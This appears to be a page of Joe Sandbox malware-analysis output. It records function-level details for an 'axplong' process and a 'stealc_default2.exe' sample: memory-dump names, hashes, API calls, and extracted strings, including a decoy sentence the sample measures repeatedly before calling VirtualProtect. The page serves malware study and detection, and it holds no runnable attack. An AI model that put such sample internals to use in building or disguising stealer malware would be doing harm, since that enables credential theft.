Associated: 00000006.00000002.4796625907.0000000000CE1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4823170685.0000000000CE2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4833765550.0000000000E7A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4834028730.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_9d0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca87a5f83cd6aa5af1d3d14ea75738b0b5d08edfc3525321a9a46f7714bb904e
Instruction ID: b5ff7cc8799b6b7e3ff87f0939dbe9e33c859c8811e9c2522682098c69dcc668
Opcode Fuzzy Hash: ca87a5f83cd6aa5af1d3d14ea75738b0b5d08edfc3525321a9a46f7714bb904e
Instruction Fuzzy Hash: 98E08C3025160C6FCF357B24EB5CD8C3B1AEF11349F049800F81846262CB36ECD1D980

Function 00A0A1C2 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4792704599.00000000009D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000006.00000002.4792178627.00000000009D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4792704599.0000000000A32000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4795540825.0000000000A39000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000A3B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000BBF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000C9A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000CCB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000CD2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000CE1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4823170685.0000000000CE2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4833765550.0000000000E7A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4834028730.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_9d0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction ID: 400c63fd6e691b00e2939fd264e30200bf41017bb73bcf146bd74addbcfb8362
Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction Fuzzy Hash: 47E0B672925228EBCB15DB989A5498AF2ACEB49B50F654596B501D3291C270DF00C7D1

Function 009E2E20 Relevance: 17.9, APIs: 3, Strings: 7, Instructions: 434COMMON

Download Yara Rule

Strings

HBhr, xrefs: 009E378F
8KG0fymoFx==, xrefs: 009E2EC7
invalid stoi argument, xrefs: 009E425A
WGt=, xrefs: 009E33BA
Fz==, xrefs: 009E369E
246122658369, xrefs: 009E33D4
stoi argument out of range, xrefs: 009E4269

Memory Dump Source

Source File: 00000006.00000002.4792704599.00000000009D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000006.00000002.4792178627.00000000009D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4792704599.0000000000A32000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4795540825.0000000000A39000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000A3B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000BBF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000C9A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000CCB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000CD2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000CE1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4823170685.0000000000CE2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4833765550.0000000000E7A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4834028730.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_9d0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID: 246122658369$8KG0fymoFx==$Fz==$HBhr$WGt=$invalid stoi argument$stoi argument out of range
API String ID: 0-2390467879
Opcode ID: 20493971158a2c9fb47e9a4c67fc66a85d33335e3deda39301c116f2f0f6a7f9
Instruction ID: 4e87e8ab284b2903b8ad8053103d1bfb4f7502d835efde7fd8678d875314f68d
Opcode Fuzzy Hash: 20493971158a2c9fb47e9a4c67fc66a85d33335e3deda39301c116f2f0f6a7f9
Instruction Fuzzy Hash: F302D170900288EFEF15DFA9C849BDEBBB5AF45304F508558F805A7282D7759E84CFA2

Function 00A04770 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 148COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00A047A7
___except_validate_context_record.LIBVCRUNTIME ref: 00A047AF
_ValidateLocalCookies.LIBCMT ref: 00A04838
__IsNonwritableInCurrentImage.LIBCMT ref: 00A04863
_ValidateLocalCookies.LIBCMT ref: 00A048B8

Strings

csm, xrefs: 00A0484D

Memory Dump Source

Source File: 00000006.00000002.4792704599.00000000009D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000006.00000002.4792178627.00000000009D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4792704599.0000000000A32000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4795540825.0000000000A39000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000A3B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000BBF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000C9A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000CCB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000CD2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000CE1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4823170685.0000000000CE2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4833765550.0000000000E7A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4834028730.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_9d0000_axplong.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 707731f781d6359df5b971d68defbf83de82b6c575172b046bbc6aa6d1c8fa35
Instruction ID: 756f3c9cc8ae85f23165a173b03ead46e12845d905257bc9d2313d0cd7d78230
Opcode Fuzzy Hash: 707731f781d6359df5b971d68defbf83de82b6c575172b046bbc6aa6d1c8fa35
Instruction Fuzzy Hash: F051B474A0024CABCF14DF68E885AAE7BB5BF49314F14C465EA149B3D2D731EE49CB90

Function 00A070C9 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON

Download Yara Rule

APIs

_wcsrchr.LIBVCRUNTIME ref: 00A0710B

Strings

.cmd, xrefs: 00A07129
.com, xrefs: 00A0714B
.bat, xrefs: 00A0713A
.exe, xrefs: 00A07118

Memory Dump Source

Source File: 00000006.00000002.4792704599.00000000009D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000006.00000002.4792178627.00000000009D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4792704599.0000000000A32000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4795540825.0000000000A39000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000A3B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000BBF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000C9A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000CCB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000CD2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000CE1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4823170685.0000000000CE2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4833765550.0000000000E7A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4834028730.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_9d0000_axplong.jbxd

Yara matches

Similarity

API ID: _wcsrchr
String ID: .bat$.cmd$.com$.exe
API String ID: 1752292252-4019086052
Opcode ID: d750030ca256f5a49286178e17731e68dab63b7f43e8aac712b94a92188870f3
Instruction ID: 6d005d63c15c041f83c88cedf6ac7b3263a2d7db77165094e5afaaa25bc8a6b9
Opcode Fuzzy Hash: d750030ca256f5a49286178e17731e68dab63b7f43e8aac712b94a92188870f3
Instruction Fuzzy Hash: B1010837E1822A32A6186518BD1263F17889B82BB471A012AF954F73C1DF64EC0251A0

Function 009D2E80 Relevance: 7.8, APIs: 5, Instructions: 272COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 009D2F1F
__Mtx_unlock.LIBCPMT ref: 009D2F8C
__Cnd_broadcast.LIBCPMT ref: 009D2FA3
__Mtx_unlock.LIBCPMT ref: 009D30B5
__Mtx_unlock.LIBCPMT ref: 009D315B

Memory Dump Source

Source File: 00000006.00000002.4792704599.00000000009D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000006.00000002.4792178627.00000000009D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4792704599.0000000000A32000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4795540825.0000000000A39000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000A3B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000BBF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000C9A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000CCB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000CD2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000CE1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4823170685.0000000000CE2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4833765550.0000000000E7A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4834028730.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_9d0000_axplong.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$Cnd_broadcast
String ID:
API String ID: 32384418-0
Opcode ID: 1dfe41dc4fe6952c98ce2991ecb08a3118bf08288d3e786b6798ad860ba7cd0a
Instruction ID: 7e34c5f3c94b036f40b962034750725240b4ae4382e2ff449cd273f670959771
Opcode Fuzzy Hash: 1dfe41dc4fe6952c98ce2991ecb08a3118bf08288d3e786b6798ad860ba7cd0a
Instruction Fuzzy Hash: EDA112B0945246AFDB22DF69C84476AB7B8FF55311F00C62AE815D7341EB34EE05CB92

Function 00A0C9B0 Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00A0CA37

Memory Dump Source

Source File: 00000006.00000002.4792704599.00000000009D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000006.00000002.4792178627.00000000009D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4792704599.0000000000A32000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4795540825.0000000000A39000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000A3B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000BBF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000C9A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000CCB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000CD2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000CE1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4823170685.0000000000CE2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4833765550.0000000000E7A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4834028730.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_9d0000_axplong.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 7941c91dc3c81985f55d5af0d0e5d35b4c2fcc41726f6f06d2574da038ee3747
Instruction ID: e934f1e66d48dfd5817e19bb4134e3a58f7d2f2be7e4eea0593bf22d98efd0cb
Opcode Fuzzy Hash: 7941c91dc3c81985f55d5af0d0e5d35b4c2fcc41726f6f06d2574da038ee3747
Instruction Fuzzy Hash: D6B12832A0028D9FEB15CF68D8817AEBBF5EF55360F14826AE855DB382D6349D41CB60

Function 009EBAA2 Relevance: 6.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 009EBAFA
__Xtime_diff_to_millis2.LIBCPMT ref: 009EBB14
_xtime_get.LIBCPMT ref: 009EBB37
__Xtime_diff_to_millis2.LIBCPMT ref: 009EBB43

Memory Dump Source

Source File: 00000006.00000002.4792704599.00000000009D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000006.00000002.4792178627.00000000009D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4792704599.0000000000A32000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4795540825.0000000000A39000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000A3B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000BBF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000C9A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000CCB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000CD2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000CE1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4823170685.0000000000CE2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4833765550.0000000000E7A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4834028730.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_9d0000_axplong.jbxd

Yara matches

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: a3da72e5dff52e3a4e9ffaececd4f4d5a91f3933fb772cc2eba7dc4b71bd4b88
Instruction ID: 5dd18384e9b5e5478850c6d98dccba0c7d02a2e9e8b5ba64d00e9ea7a87d49e8
Opcode Fuzzy Hash: a3da72e5dff52e3a4e9ffaececd4f4d5a91f3933fb772cc2eba7dc4b71bd4b88
Instruction Fuzzy Hash: 1E2153B1901249AFDF11EFA5CC41AFEBBB9EF48710F000069F601B7251DB30AD028BA1

Analysis Process: stealc_default2.exePID: 5004, Parent PID: 7060COMMON

Execution Graph

Execution Coverage:	4.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	2.8%
Total number of Nodes:	2000
Total number of Limit Nodes:	41

Executed Functions

Function 006945C0 Relevance: 112.1, APIs: 34, Strings: 30, Instructions: 114
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,006A69FB), ref: 006945CC
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,006A69FB), ref: 006945D7
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,006A69FB), ref: 006945E2
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,006A69FB), ref: 006945ED
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,006A69FB), ref: 006945F8
GetProcessHeap.KERNEL32(00000000,?,?,0000000F,?,006A69FB), ref: 00694607
RtlAllocateHeap.NTDLL(00000000,?,0000000F,?,006A69FB), ref: 0069460E
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,006A69FB), ref: 0069461C
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,006A69FB), ref: 00694627
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,006A69FB), ref: 00694632
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,006A69FB), ref: 0069463D
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,006A69FB), ref: 00694648
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,006A69FB), ref: 0069465C
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,006A69FB), ref: 00694667
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,006A69FB), ref: 00694672
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,006A69FB), ref: 0069467D
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,006A69FB), ref: 00694688
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 006946B1
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 006946BC
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 006946C7
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 006946D2
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 006946DD
strlen.MSVCRT ref: 006946F0
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00694718
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00694723
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0069472E
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00694739
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00694744
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00694754
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0069475F
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0069476A
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00694775
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00694780
VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0069479C

Strings

The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00694657
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00694662
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00694713
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0069475A
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00694622
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00694765
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0069462D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006946C2
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00694734
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0069474F
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006946D8
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006945C7
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00694643
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006945E8
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006945F3
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006946B7
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006946AC
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0069473F
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00694729
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006945D2
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006945DD
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00694770
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00694683
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0069471E
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00694638
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00694678
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00694617
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006946CD
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0069466D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0069477B

Memory Dump Source

Source File: 00000007.00000002.3110915823.0000000000691000.00000080.00000001.01000000.00000009.sdmp, Offset: 00690000, based on PE: true

Associated: 00000007.00000002.3110892989.0000000000690000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3110980719.00000000006AE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111010128.00000000006BB000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006EA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000715000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000718000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000071F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000722000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000741000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000074D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000772000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000077F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000079F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000835000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000855000.00000004.00000001.01000000.00000009.sdmpDownload File
